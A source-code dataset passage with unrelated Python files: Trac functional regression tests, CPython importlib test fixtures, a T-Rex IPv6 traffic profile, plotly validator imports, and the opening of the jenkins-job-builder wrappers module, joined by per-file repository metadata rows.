        self._tester.go_to_ticket(ticketid)
        tc.find('Preserved Descr')
        # Now replace the existing attachment, and the description should come
        # through.
        self._tester.attach_file_to_ticket(ticketid, filename='hello.txt',
                                           description='', replace=True)
        self._tester.go_to_ticket(ticketid)
        tc.find('Preserved Descr')

        self._tester.attach_file_to_ticket(ticketid, filename='blah.txt',
                                           description='Second Attachment')
        self._tester.go_to_ticket(ticketid)
        tc.find('Second Attachment')

        # This one should get a new description when it's replaced
        # (Second->Other)
        self._tester.attach_file_to_ticket(ticketid, filename='blah.txt',
                                           description='Other Attachment',
                                           replace=True)
        self._tester.go_to_ticket(ticketid)
        tc.find('Other Attachment')
        tc.notfind('Second Attachment')


class RegressionTestTicket9880(FunctionalTwillTestCaseSetup):
    def runTest(self):
        """Test for regression of http://trac.edgewall.org/ticket/9880

        Upload of a file which the browsers associates a Content-Type
        of multipart/related (e.g. an .mht file) should succeed.
        """
        ticketid = self._tester.create_ticket()
        self._tester.create_ticket()
        self._tester.attach_file_to_ticket(ticketid, filename='hello.mht',
                                           content_type='multipart/related',
                                           data="""
Well, the actual content of the file doesn't matter, the problem is
related to the "multipart/..." content_type associated to the file.
See also http://bugs.python.org/issue15564.
""")


class RegressionTestTicket3663(FunctionalTwillTestCaseSetup):
    def runTest(self):
        """Regression test for non-UTF-8 PATH_INFO (#3663)

        Verify that URLs not encoded with UTF-8 are reported as invalid.
        """
        # invalid PATH_INFO
        self._tester.go_to_wiki(u'été'.encode('latin1'))
        tc.code(404)
        tc.find('Invalid URL encoding')
        # invalid SCRIPT_NAME
        tc.go(u'été'.encode('latin1'))
        tc.code(404)
        tc.find('Invalid URL encoding')


class RegressionTestTicket6318(FunctionalTwillTestCaseSetup):
    def runTest(self):
        """Regression test for non-ascii usernames (#6318)
        """
        # first do a logout, otherwise we might end up logged in as
        # admin again, as this is the first thing the tester does.
        # ... but even before that we need to make sure we're coming
        # from a valid URL, which is not the case if we're just coming
        # from the above test! ('/wiki/\xE9t\xE9')
        self._tester.go_to_front()
        self._tester.logout()
        try:
            # also test a regular ascii user name
            self._testenv.adduser(u'user')
            self._tester.login(u'user')
            self._tester.go_to_front()
            self._tester.logout()
            # now test utf-8 user name
            self._testenv.adduser(u'joé')
            self._tester.login(u'joé')
            self._tester.go_to_front()
            # when failed to retrieve session, FakeSession() and FakePerm()
            # are used and the req.perm has no permissions.
            tc.notfind(internal_error)
            tc.notfind("You don't have the required permissions")
            self._tester.logout()
            # finally restore expected 'admin' login
            self._tester.login('admin')
        finally:
            self._testenv.deluser(u'joé')
class RegressionTestTicket11434(FunctionalTwillTestCaseSetup):
    """Test for regression of http://trac.edgewall.org/ticket/11434
    Defects reported to trac-hacks should use the Component defined in the
    plugin's URL.
    """
    def runTest(self):
        # Install a plugin that declares a trac-hacks url at module level;
        # the error page's report form should then target trac-hacks with
        # the component taken from that url.
        env = self._testenv.get_trac_environment()
        env.config.set('components', 'RaiseExceptionPlugin.*', 'enabled')
        env.config.save()
        create_file(os.path.join(env.plugins_dir, 'RaiseExceptionPlugin.py'),
"""\
from trac.core import Component, implements
from trac.web.api import IRequestHandler

url = 'http://trac-hacks.org/wiki/HelloWorldMacro'

class RaiseExceptionPlugin(Component):
    implements(IRequestHandler)

    def match_request(self, req):
        if req.path_info == '/raise-exception':
            return True

    def process_request(self, req):
        raise Exception
""")

        try:
            tc.go(self._tester.url + '/raise-exception')
            tc.find(internal_error)
            tc.find('<form class="newticket" method="get" '
                    'action="http://trac-hacks.org/newticket">')
            tc.find('<input type="hidden" name="component" '
                    'value="HelloWorldMacro" />')
        finally:
            env.config.set('components', 'RaiseExceptionPlugin.*', 'disabled')


class RegressionTestTicket11503a(FunctionalTwillTestCaseSetup):
    def runTest(self):
        """Test for regression of http://trac.edgewall.org/ticket/11503 a"""
        # Percent-encoded (and double-encoded) path segments must redirect
        # cleanly, never trigger an internal error.
        base = self._tester.url

        tc.go(base + '/notf%C5%91und/')
        tc.notfind(internal_error)
        tc.url(re.escape(base + '/notf%C5%91und') + r'\Z')

        tc.go(base + '/notf%C5%91und/?type=def%C3%A9ct')
        tc.notfind(internal_error)
        tc.url(re.escape(base + '/notf%C5%91und?type=def%C3%A9ct') + r'\Z')

        tc.go(base + '/notf%C5%91und/%252F/?type=%252F')
        tc.notfind(internal_error)
        tc.url(re.escape(base + '/notf%C5%91und/%252F?type=%252F') + r'\Z')


class RegressionTestTicket11503b(FunctionalTwillTestCaseSetup):
    def runTest(self):
        """Test for regression of http://trac.edgewall.org/ticket/11503 b"""
        # A non-ascii, percent-containing mainnav href must render escaped.
        env = self._testenv.get_trac_environment()
        try:
            env.config.set('mainnav', 'wiki.href',
                           u'/wiki/SändBõx?action=history&blah=%252F')
            env.config.save()
            # reloads the environment
            env = self._testenv.get_trac_environment()

            self._tester.go_to_front()
            tc.notfind(internal_error)
            tc.find(' href="/wiki/S%C3%A4ndB%C3%B5x\?'
                    'action=history&blah=%252F"')
        finally:
            env.config.remove('mainnav', 'wiki.href')
            env.config.save()


def functionalSuite(suite=None):
    """Append this module's test cases to *suite* (created if None)."""
    if not suite:
        import trac.tests.functional
        suite = trac.tests.functional.functionalSuite()
    suite.addTest(TestAttachmentNonexistentParent())
    suite.addTest(TestAboutPage())
    suite.addTest(TestErrorPage())
    suite.addTest(RegressionTestRev6017())
    suite.addTest(RegressionTestTicket3833a())
    suite.addTest(RegressionTestTicket3833b())
    suite.addTest(RegressionTestTicket3833c())
    suite.addTest(RegressionTestTicket5572())
    suite.addTest(RegressionTestTicket7209())
    suite.addTest(RegressionTestTicket9880())
    suite.addTest(RegressionTestTicket3663())
    suite.addTest(RegressionTestTicket6318())
    suite.addTest(RegressionTestTicket11434())
    suite.addTest(RegressionTestTicket11503a())
    suite.addTest(RegressionTestTicket11503b())
    return suite


# Alias used by the test-discovery entry point below.
test_suite = functionalSuite

if __name__ == '__main__':
    unittest.main(defaultTest='test_suite')
| 39.309002 | 79 | 0.62565 |
acf6bc87c74e9dc1a01195880c5442cf7b791be5 | 6,885 | py | Python | Lib/test/test_importlib/fixtures.py | eldipa/cpython | 0d6bd1ca7c683137d52041194f3a2b02219f225a | [
"0BSD"
] | 2 | 2019-06-07T17:28:28.000Z | 2020-09-24T21:41:14.000Z | Lib/test/test_importlib/fixtures.py | eldipa/cpython | 0d6bd1ca7c683137d52041194f3a2b02219f225a | [
"0BSD"
] | 50 | 2020-01-07T19:11:11.000Z | 2022-03-01T14:40:03.000Z | Lib/test/test_importlib/fixtures.py | thomboroboto/cpyth | 7375b42fe8ac3562f5179ca5a6edcffda578ce35 | [
"0BSD"
] | 4 | 2018-07-13T08:20:36.000Z | 2020-09-28T18:02:05.000Z | import os
import sys
import shutil
import pathlib
import tempfile
import textwrap
import contextlib
import unittest
from test.support.os_helper import FS_NONASCII
from typing import Dict, Union
@contextlib.contextmanager
def tempdir():
    """Yield a pathlib.Path to a fresh temporary directory, removed on exit."""
    created = tempfile.mkdtemp()
    try:
        yield pathlib.Path(created)
    finally:
        shutil.rmtree(created)
@contextlib.contextmanager
def save_cwd():
    """Restore the current working directory when the context exits."""
    previous = os.getcwd()
    try:
        yield
    finally:
        os.chdir(previous)
@contextlib.contextmanager
def tempdir_as_cwd():
    """Create a temp dir, chdir into it for the duration, then restore."""
    with tempdir() as tmp, save_cwd():
        os.chdir(str(tmp))
        yield tmp
@contextlib.contextmanager
def install_finder(finder):
    """Temporarily register *finder* on sys.meta_path, removing it on exit."""
    sys.meta_path.append(finder)
    try:
        yield
    finally:
        sys.meta_path.remove(finder)
class Fixtures:
    """Test mixin that tears down entered fixture contexts via an ExitStack."""

    def setUp(self):
        # All fixture contexts are entered on this stack and closed together
        # when the test's cleanups run.
        self.fixtures = contextlib.ExitStack()
        self.addCleanup(self.fixtures.close)


class SiteDir(Fixtures):
    """Provide a throwaway directory as ``self.site_dir``."""

    def setUp(self):
        super(SiteDir, self).setUp()
        self.site_dir = self.fixtures.enter_context(tempdir())


class OnSysPath(Fixtures):
    """Prepend ``self.site_dir`` to sys.path for the test's duration."""

    @staticmethod
    @contextlib.contextmanager
    def add_sys_path(dir):
        """Temporarily prepend *dir* to sys.path."""
        sys.path[:0] = [str(dir)]
        try:
            yield
        finally:
            sys.path.remove(str(dir))

    def setUp(self):
        super(OnSysPath, self).setUp()
        self.fixtures.enter_context(self.add_sys_path(self.site_dir))


# Except for python/mypy#731, prefer to define
# FilesDef = Dict[str, Union['FilesDef', str]]
FilesDef = Dict[str, Union[Dict[str, Union[Dict[str, str], str]], str]]
class DistInfoPkg(OnSysPath, SiteDir):
    """Site dir containing a .dist-info distribution plus its module."""

    files: FilesDef = {
        "distinfo_pkg-1.0.0.dist-info": {
            "METADATA": """
                Name: distinfo-pkg
                Author: Steven Ma
                Version: 1.0.0
                Requires-Dist: wheel >= 1.0
                Requires-Dist: pytest; extra == 'test'
                """,
            "RECORD": "mod.py,sha256=abc,20\n",
            "entry_points.txt": """
                [entries]
                main = mod:main
                ns:sub = mod:main
                """,
        },
        "mod.py": """
            def main():
                print("hello world")
            """,
    }

    def setUp(self):
        super(DistInfoPkg, self).setUp()
        build_files(DistInfoPkg.files, self.site_dir)


class DistInfoPkgWithDot(OnSysPath, SiteDir):
    """Distribution whose project name contains a dot ("pkg.dot")."""

    files: FilesDef = {
        "pkg_dot-1.0.0.dist-info": {
            "METADATA": """
                Name: pkg.dot
                Version: 1.0.0
                """,
        },
    }

    def setUp(self):
        super(DistInfoPkgWithDot, self).setUp()
        build_files(DistInfoPkgWithDot.files, self.site_dir)


class DistInfoPkgWithDotLegacy(OnSysPath, SiteDir):
    """Dotted-name distributions using legacy directory spellings."""

    files: FilesDef = {
        "pkg.dot-1.0.0.dist-info": {
            "METADATA": """
                Name: pkg.dot
                Version: 1.0.0
                """,
        },
        "pkg.lot.egg-info": {
            "METADATA": """
                Name: pkg.lot
                Version: 1.0.0
                """,
        },
    }

    def setUp(self):
        super(DistInfoPkgWithDotLegacy, self).setUp()
        build_files(DistInfoPkgWithDotLegacy.files, self.site_dir)


class DistInfoPkgOffPath(SiteDir):
    """Same fixture files as DistInfoPkg, but without sys.path insertion."""

    def setUp(self):
        super(DistInfoPkgOffPath, self).setUp()
        build_files(DistInfoPkg.files, self.site_dir)


class EggInfoPkg(OnSysPath, SiteDir):
    """Site dir containing a legacy .egg-info distribution plus its module."""

    files: FilesDef = {
        "egginfo_pkg.egg-info": {
            "PKG-INFO": """
                Name: egginfo-pkg
                Author: Steven Ma
                License: Unknown
                Version: 1.0.0
                Classifier: Intended Audience :: Developers
                Classifier: Topic :: Software Development :: Libraries
                """,
            "SOURCES.txt": """
                mod.py
                egginfo_pkg.egg-info/top_level.txt
                """,
            "entry_points.txt": """
                [entries]
                main = mod:main
                """,
            "requires.txt": """
                wheel >= 1.0; python_version >= "2.7"
                [test]
                pytest
                """,
            "top_level.txt": "mod\n",
        },
        "mod.py": """
            def main():
                print("hello world")
            """,
    }

    def setUp(self):
        super(EggInfoPkg, self).setUp()
        build_files(EggInfoPkg.files, prefix=self.site_dir)


class EggInfoFile(OnSysPath, SiteDir):
    """Site dir containing a single-file .egg-info distribution."""

    files: FilesDef = {
        "egginfo_file.egg-info": """
            Metadata-Version: 1.0
            Name: egginfo_file
            Version: 0.1
            Summary: An example package
            Home-page: www.example.com
            Author: Eric Haffa-Vee
            Author-email: eric@example.coms
            License: UNKNOWN
            Description: UNKNOWN
            Platform: UNKNOWN
            """,
    }

    def setUp(self):
        super(EggInfoFile, self).setUp()
        build_files(EggInfoFile.files, prefix=self.site_dir)


class LocalPackage:
    """A minimal setuptools project laid out in a temporary cwd."""

    files: FilesDef = {
        "setup.py": """
            import setuptools
            setuptools.setup(name="local-pkg", version="2.0.1")
            """,
    }

    def setUp(self):
        self.fixtures = contextlib.ExitStack()
        self.addCleanup(self.fixtures.close)
        self.fixtures.enter_context(tempdir_as_cwd())
        build_files(self.files)
def build_files(file_defs, prefix=pathlib.Path()):
    """Build a set of files/directories, as described by the
    file_defs dictionary. Each key/value pair in the dictionary is
    interpreted as a filename/contents pair. If the contents value is a
    dictionary, a directory is created, and the dictionary interpreted
    as the files within it, recursively.

    For example:

    {"README.txt": "A README file",
     "foo": {
        "__init__.py": "",
        "bar": {
            "__init__.py": "",
        },
        "baz.py": "# Some code",
     }
    }

    String contents are dedented/left-stripped via DALS before writing;
    bytes contents are written verbatim.
    """
    for entry, payload in file_defs.items():
        target = prefix / entry
        if isinstance(payload, dict):
            target.mkdir()
            build_files(payload, prefix=target)
        elif isinstance(payload, bytes):
            target.write_bytes(payload)
        else:
            target.write_text(DALS(payload))
class FileBuilder:
    """Mixin supplying filename fixtures for file-system tests."""

    def unicode_filename(self):
        """Return a non-ASCII filename, skipping if the FS can't encode one."""
        if FS_NONASCII:
            return FS_NONASCII
        return self.skip("File system does not support non-ascii.")

    def skip(self, reason):
        """Abort the current test with *reason*."""
        raise unittest.SkipTest(reason)
def DALS(str):
    """Dedent And Left-Strip: normalize an indented triple-quoted literal."""
    dedented = textwrap.dedent(str)
    return dedented.lstrip()
class NullFinder:
    """Meta-path finder stub that never matches any module."""

    def find_module(self, name):
        """Always report 'not found' by returning None."""
        return None
| 25.036364 | 82 | 0.543065 |
acf6bccc165665efa01ba2923af7c3ff329f7305 | 3,774 | py | Python | resources/traffic_profiles/trex/trex-sl-2n-dot1qip6asym-ip6src253.py | preym17/csit | 3151c98618c78e3782e48bbe4d9c8f906c126f69 | [
"Apache-2.0"
] | null | null | null | resources/traffic_profiles/trex/trex-sl-2n-dot1qip6asym-ip6src253.py | preym17/csit | 3151c98618c78e3782e48bbe4d9c8f906c126f69 | [
"Apache-2.0"
] | null | null | null | resources/traffic_profiles/trex/trex-sl-2n-dot1qip6asym-ip6src253.py | preym17/csit | 3151c98618c78e3782e48bbe4d9c8f906c126f69 | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2019 Cisco and/or its affiliates.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Stream profile for T-rex traffic generator.
Stream profile:
- Two streams sent in directions 0 --> 1 and 1 --> 0 at the same time.
- Direction 0 --> 1:
- Packet: ETH / IPv6 /
- Source IP address range: 2001:1::2 - 2001:1::FE
- Destination IP address range: 2001:2::2
- Direction 1 --> 0:
- Packet: ETH / DOT1Q / IPv6 /
- Source IP address range: 2001:2::2 - 2001:2::FE
- Destination IP address range: 2001:1::2
"""
from trex.stl.api import *
from profile_trex_stateless_base_class import TrafficStreamsBaseClass
class TrafficStreams(TrafficStreamsBaseClass):
    """Stream profile."""

    def __init__(self):
        """Initialization and setting of streams' parameters."""
        # NOTE(review): super() is bound to TrafficStreamsBaseClass, which
        # skips that class's own __init__ in the MRO; this mirrors the
        # sibling CSIT profiles — confirm it is intentional.
        super(TrafficStreamsBaseClass, self).__init__()

        # VLAN ID
        self.vlan_id = 10

        # IPs used in packet headers.
        self.p1_src_start_ip = '2001:1::2'
        self.p1_src_end_ip = '2001:1::FE'
        self.p1_dst_start_ip = '2001:2::2'

        self.p2_src_start_ip = '2001:2::2'
        self.p2_src_end_ip = '2001:2::FE'
        self.p2_dst_start_ip = '2001:1::2'

    def define_packets(self):
        """Defines the packets to be sent from the traffic generator.

        Packet definition: | ETH | IPv6 |

        :returns: Packets to be sent from the traffic generator.
        :rtype: tuple
        """
        # Integer base address and range size for each source-IP sweep.
        base_p1, count_p1 = self._get_start_end_ipv6(self.p1_src_start_ip,
                                                     self.p1_src_end_ip)
        base_p2, count_p2 = self._get_start_end_ipv6(self.p2_src_start_ip,
                                                     self.p2_src_end_ip)

        # Direction 0 --> 1 (untagged).
        base_pkt_a = (Ether() /
                      IPv6(src=self.p1_src_start_ip,
                           dst=self.p1_dst_start_ip))
        # Direction 1 --> 0 — only this side carries the 802.1Q tag
        # (asymmetric dot1q profile).
        base_pkt_b = (Ether() /
                      Dot1Q(vlan=self.vlan_id) /
                      IPv6(src=self.p2_src_start_ip,
                           dst=self.p2_dst_start_ip))

        # Direction 0 --> 1: increment the low 64 bits of IPv6.src
        # (size=8 with offset_fixup=8 targets the address's second half).
        vm1 = STLScVmRaw([STLVmFlowVar(name="ipv6_src",
                                       min_value=base_p1,
                                       max_value=base_p1 + count_p1,
                                       size=8, op="inc"),
                          STLVmWrFlowVar(fv_name="ipv6_src",
                                         pkt_offset="IPv6.src",
                                         offset_fixup=8)])
        # Direction 1 --> 0
        vm2 = STLScVmRaw([STLVmFlowVar(name="ipv6_src",
                                       min_value=base_p2,
                                       max_value=base_p2 + count_p2,
                                       size=8, op="inc"),
                          STLVmWrFlowVar(fv_name="ipv6_src",
                                         pkt_offset="IPv6.src",
                                         offset_fixup=8)])

        return base_pkt_a, base_pkt_b, vm1, vm2
def register():
    """Register this traffic profile to T-rex.

    Do not change this function.

    :returns: Traffic streams.
    :rtype: Object
    """
    return TrafficStreams()
| 35.942857 | 74 | 0.552199 |
acf6c173d895faeff4e29965cf6f52da1afa67b9 | 1,317 | py | Python | packages/python/plotly/plotly/validators/parcoords/line/__init__.py | labaran1/plotly.py | 7ec751e8fed4a570c11ea4bea2231806389d62eb | [
"MIT"
] | null | null | null | packages/python/plotly/plotly/validators/parcoords/line/__init__.py | labaran1/plotly.py | 7ec751e8fed4a570c11ea4bea2231806389d62eb | [
"MIT"
] | null | null | null | packages/python/plotly/plotly/validators/parcoords/line/__init__.py | labaran1/plotly.py | 7ec751e8fed4a570c11ea4bea2231806389d62eb | [
"MIT"
] | null | null | null | import sys
from typing import TYPE_CHECKING
# Validator re-exports.  Import eagerly on Python < 3.7 (which lacks
# module-level __getattr__) and under static type checkers; otherwise
# defer to plotly's relative_import machinery, which installs lazy
# __getattr__/__dir__ hooks so submodules load on first attribute access.
if sys.version_info < (3, 7) or TYPE_CHECKING:
    from ._showscale import ShowscaleValidator
    from ._reversescale import ReversescaleValidator
    from ._colorsrc import ColorsrcValidator
    from ._colorscale import ColorscaleValidator
    from ._colorbar import ColorbarValidator
    from ._coloraxis import ColoraxisValidator
    from ._color import ColorValidator
    from ._cmin import CminValidator
    from ._cmid import CmidValidator
    from ._cmax import CmaxValidator
    from ._cauto import CautoValidator
    from ._autocolorscale import AutocolorscaleValidator
else:
    from _plotly_utils.importers import relative_import

    __all__, __getattr__, __dir__ = relative_import(
        __name__,
        [],
        [
            "._showscale.ShowscaleValidator",
            "._reversescale.ReversescaleValidator",
            "._colorsrc.ColorsrcValidator",
            "._colorscale.ColorscaleValidator",
            "._colorbar.ColorbarValidator",
            "._coloraxis.ColoraxisValidator",
            "._color.ColorValidator",
            "._cmin.CminValidator",
            "._cmid.CmidValidator",
            "._cmax.CmaxValidator",
            "._cauto.CautoValidator",
            "._autocolorscale.AutocolorscaleValidator",
        ],
    )
| 34.657895 | 56 | 0.682612 |
acf6c1fc3701b6b5f1839a227f55be0c2302a091 | 99,140 | py | Python | jenkins_jobs/modules/wrappers.py | beaker-project/jenkins-job-builder | 324e0197c4deb2a515351ae48fbc9cfa58920117 | [
"Apache-2.0"
] | null | null | null | jenkins_jobs/modules/wrappers.py | beaker-project/jenkins-job-builder | 324e0197c4deb2a515351ae48fbc9cfa58920117 | [
"Apache-2.0"
] | 1 | 2018-02-21T05:34:32.000Z | 2018-02-27T23:51:41.000Z | jenkins_jobs/modules/wrappers.py | beaker-project/jenkins-job-builder | 324e0197c4deb2a515351ae48fbc9cfa58920117 | [
"Apache-2.0"
] | null | null | null | # Copyright 2012 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Wrappers can alter the way the build is run as well as the build output.
**Component**: wrappers
:Macro: wrapper
:Entry Point: jenkins_jobs.wrappers
"""
import logging
import pkg_resources
import sys
import xml.etree.ElementTree as XML
from jenkins_jobs.errors import InvalidAttributeError
from jenkins_jobs.errors import JenkinsJobsException
import jenkins_jobs.modules.base
from jenkins_jobs.modules.builders import create_builders
from jenkins_jobs.modules.helpers import artifactory_common_details
from jenkins_jobs.modules.helpers import artifactory_deployment_patterns
from jenkins_jobs.modules.helpers import artifactory_env_vars_patterns
from jenkins_jobs.modules.helpers import artifactory_optional_props
from jenkins_jobs.modules.helpers import artifactory_repository
from jenkins_jobs.modules.helpers import config_file_provider_builder
from jenkins_jobs.modules.helpers import convert_mapping_to_xml
# Module-level logger shared by the wrapper generators below.
logger = logging.getLogger(__name__)
# Minutes-to-seconds factor: YAML options take minutes, but the
# build-timeout plugin's 'no-activity' strategy is configured in seconds.
MIN_TO_SEC = 60
def docker_custom_build_env(registry, xml_parent, data):
    """yaml: docker-custom-build-env
    Allows the definition of a build environment for a job using a Docker
    container.
    Requires the Jenkins :jenkins-wiki:`CloudBees Docker Custom Build
    Environment Plugin<CloudBees+Docker+Custom+Build+Environment+Plugin>`.
    :arg str image-type: Docker image type. Valid values and their
        additional attributes described in the image_types_ table
    :arg str docker-tool: The name of the docker installation to use
        (default 'Default')
    :arg str host: URI to the docker host you are using
    :arg str credentials-id: Argument to specify the ID of credentials to use
        for docker host (optional)
    :arg str registry-credentials-id: Argument to specify the ID of
        credentials to use for docker registry (optional)
    :arg list volumes: Volumes to bind mound from slave host into container
        :volume: * **host-path** (`str`) Path on host
                 * **path** (`str`) Path inside container
    :arg bool verbose: Log docker commands executed by plugin on build log
        (default false)
    :arg bool privileged: Run in privileged mode (default false)
    :arg bool force-pull: Force pull (default false)
    :arg str group: The user to run build has to be the same as the Jenkins
        slave user so files created in workspace have adequate owner and
        permission set
    :arg str command: Container start command (default '/bin/cat')
    :arg str net: Network bridge (default 'bridge')
    .. _image_types:
    ================== ====================================================
    Image Type         Description
    ================== ====================================================
    dockerfile         Build docker image from a Dockerfile in project
                       workspace. With this option, project can define the
                       build environment as a Dockerfile stored in SCM with
                       project source code
                       :context-path: (str) Path to docker context
                           (default '.')
                       :dockerfile: (str) Use an alternate Dockerfile to
                           build the container hosting this build
                           (default 'Dockerfile')
    pull               Pull specified docker image from Docker repository
                       :image: (str) Image id/tag
    ================== ====================================================
    Example:
    .. literalinclude::
        /../../tests/wrappers/fixtures/docker-custom-build-env001.yaml
       :language: yaml
    """
    # All of the plugin's XML classes live under this Java package prefix.
    core_prefix = 'com.cloudbees.jenkins.plugins.okidocki.'
    entry_xml = XML.SubElement(
        xml_parent, core_prefix + 'DockerBuildWrapper')
    entry_xml.set('plugin', 'docker-custom-build-environment')
    selectorobj = XML.SubElement(entry_xml, 'selector')
    # 'image-type' is required (KeyError if missing) and selects which
    # selector class is emitted.
    image_type = data['image-type']
    if image_type == 'dockerfile':
        selectorobj.set('class', core_prefix + 'DockerfileImageSelector')
        dockerfile_mapping = [
            ('context-path', 'contextPath', '.'),
            ('dockerfile', 'dockerfile', 'Dockerfile')]
        convert_mapping_to_xml(selectorobj, data,
                               dockerfile_mapping, fail_required=True)
    elif image_type == 'pull':
        selectorobj.set('class', core_prefix + 'PullDockerImageSelector')
        pull_mapping = [('image', 'image', '')]
        convert_mapping_to_xml(selectorobj, data,
                               pull_mapping, fail_required=True)
    # NOTE(review): any other image-type silently leaves <selector> without
    # a class attribute — presumably validated elsewhere; confirm.
    XML.SubElement(entry_xml, 'dockerInstallation').text = data.get(
        'docker-tool', 'Default')
    host = XML.SubElement(entry_xml, 'dockerHost')
    host.set('plugin', 'docker-commons')
    # Host URI / credentials are optional, hence fail_required=False.
    mapping_optional = [
        ('host', 'uri', None),
        ('credentials-id', 'credentialsId', None)]
    convert_mapping_to_xml(host, data, mapping_optional, fail_required=False)
    XML.SubElement(entry_xml, 'dockerRegistryCredentials').text = data.get(
        'registry-credentials-id', '')
    volumesobj = XML.SubElement(entry_xml, 'volumes')
    volumes = data.get('volumes', [])
    if not volumes:
        # The plugin expects an explicit empty-list marker when no volumes
        # are configured.
        volumesobj.set('class', 'empty-list')
    else:
        for volume in volumes:
            volumeobj = XML.SubElement(
                volumesobj, 'com.cloudbees.jenkins.plugins.okidocki.Volume')
            XML.SubElement(volumeobj, 'hostPath').text = volume['volume'].get(
                'host-path', '')
            XML.SubElement(volumeobj, 'path').text = volume['volume'].get(
                'path', '')
    mapping = [
        ('force-pull', 'forcePull', False),
        ('privileged', 'privileged', False),
        ('verbose', 'verbose', False),
        ('group', 'group', ''),
        ('command', 'command', '/bin/cat'),
        ('net', 'net', 'bridge')]
    convert_mapping_to_xml(entry_xml, data, mapping, fail_required=True)
def ci_skip(registry, xml_parent, data):
    """yaml: ci-skip
    Skip making a build for certain push.
    Just add [ci skip] into your commit's message to let Jenkins know,
    that you do not want to perform build for the next push.
    Requires the Jenkins :jenkins-wiki:`Ci Skip Plugin <Ci+Skip+Plugin>`.
    Example:
    .. literalinclude:: /../../tests/wrappers/fixtures/ci-skip001.yaml
    """
    # The plugin is Ruby-based, so the wrapper is expressed through the
    # generic ruby-proxy-object structure.
    proxy = XML.SubElement(xml_parent, 'ruby-proxy-object')
    wrapper = XML.SubElement(proxy, 'ruby-object', attrib={
        'pluginid': 'ci-skip',
        'ruby-class': 'Jenkins::Tasks::BuildWrapperProxy'
    })
    XML.SubElement(wrapper, 'pluginid', {
        'pluginid': 'ci-skip', 'ruby-class': 'String'
    }).text = 'ci-skip'
    skip_obj = XML.SubElement(wrapper, 'object', {
        'ruby-class': 'CiSkipWrapper', 'pluginid': 'ci-skip'
    })
    XML.SubElement(skip_obj, 'ci__skip', {
        'pluginid': 'ci-skip', 'ruby-class': 'NilClass'
    })
def config_file_provider(registry, xml_parent, data):
    """yaml: config-file-provider
    Provide configuration files (i.e., settings.xml for maven etc.)
    which will be copied to the job's workspace.
    Requires the Jenkins :jenkins-wiki:`Config File Provider Plugin
    <Config+File+Provider+Plugin>`.
    :arg list files: List of managed config files made up of three
        parameters
        :files: * **file-id** (`str`) -- The identifier for the managed config
                  file
                * **target** (`str`) -- Define where the file should be created
                  (default '')
                * **variable** (`str`) -- Define an environment variable to be
                  used (default '')
    Example:
    .. literalinclude:: \
    /../../tests/wrappers/fixtures/config-file-provider003.yaml
       :language: yaml
    """
    wrapper_tag = ('org.jenkinsci.plugins.configfiles.'
                   'buildwrapper.ConfigFileBuildWrapper')
    wrapper = XML.SubElement(
        xml_parent, wrapper_tag, {'plugin': 'config-file-provider'})
    # The shared helper emits the <managedFiles> section for builders
    # and wrappers alike.
    config_file_provider_builder(wrapper, data)
def logfilesize(registry, xml_parent, data):
    """yaml: logfilesize
    Abort the build if its logfile becomes too big.
    Requires the Jenkins :jenkins-wiki:`Logfilesizechecker Plugin
    <Logfilesizechecker+Plugin>`.
    :arg bool set-own: Use job specific maximum log size instead of global
        config value (default false).
    :arg bool fail: Make builds aborted by this wrapper be marked as "failed"
        (default false).
    :arg int size: Abort the build if logfile size is bigger than this
        value (in MiB, default 128). Only applies if set-own is true.
    Full Example:
    .. literalinclude:: /../../tests/wrappers/fixtures/logfilesize-full.yaml
    Minimal Example:
    .. literalinclude:: /../../tests/wrappers/fixtures/logfilesize-minimal.yaml
    """
    checker = XML.SubElement(
        xml_parent,
        'hudson.plugins.logfilesizechecker.LogfilesizecheckerWrapper')
    checker.set("plugin", "logfilesizechecker")
    convert_mapping_to_xml(
        checker, data,
        [('set-own', 'setOwn', False),
         ('size', 'maxLogSize', 128),
         ('fail', 'failBuild', False)],
        fail_required=True)
def timeout(registry, xml_parent, data):
    """yaml: timeout
    Abort the build if it runs too long.
    Requires the Jenkins :jenkins-wiki:`Build Timeout Plugin
    <Build-timeout+Plugin>`.
    :arg bool fail: Mark the build as failed (default false)
    :arg bool abort: Mark the build as aborted (default false)
    :arg bool write-description: Write a message in the description
        (default false)
    :arg int timeout: Abort the build after this number of minutes (default 3)
    :arg str timeout-var: Export an environment variable to reference the
        timeout value (optional)
    :arg str type: Timeout type to use (default absolute)
    :type values:
        * **likely-stuck**
        * **no-activity**
        * **elastic**
        * **absolute**
        * **deadline**
    :arg int elastic-percentage: Percentage of the three most recent builds
        where to declare a timeout, only applies to **elastic** type.
        (default 0)
    :arg int elastic-number-builds: Number of builds to consider computing
        average duration, only applies to **elastic** type. (default 0)
    :arg int elastic-default-timeout: Timeout to use if there were no previous
        builds, only applies to **elastic** type. (default 3)
    :arg str deadline-time: Build terminate automatically at next deadline time
        (HH:MM:SS), only applies to **deadline** type. (default 0:00:00)
    :arg int deadline-tolerance: Period in minutes after deadline when a job
        should be immediately aborted, only applies to **deadline** type.
        (default 1)
    Example (Version < 1.14):
    .. literalinclude:: /../../tests/wrappers/fixtures/timeout/timeout001.yaml
    .. literalinclude:: /../../tests/wrappers/fixtures/timeout/timeout002.yaml
    .. literalinclude:: /../../tests/wrappers/fixtures/timeout/timeout003.yaml
    Example (Version >= 1.14):
    .. literalinclude::
        /../../tests/wrappers/fixtures/timeout/version-1.14/absolute001.yaml
    .. literalinclude::
        /../../tests/wrappers/fixtures/timeout/version-1.14/no-activity001.yaml
    .. literalinclude::
        /../../tests/wrappers/fixtures/timeout/version-1.14/likely-stuck001.yaml
    .. literalinclude::
        /../../tests/wrappers/fixtures/timeout/version-1.14/elastic001.yaml
    .. literalinclude::
        /../../tests/wrappers/fixtures/timeout/version-1.15/deadline001.yaml
    """
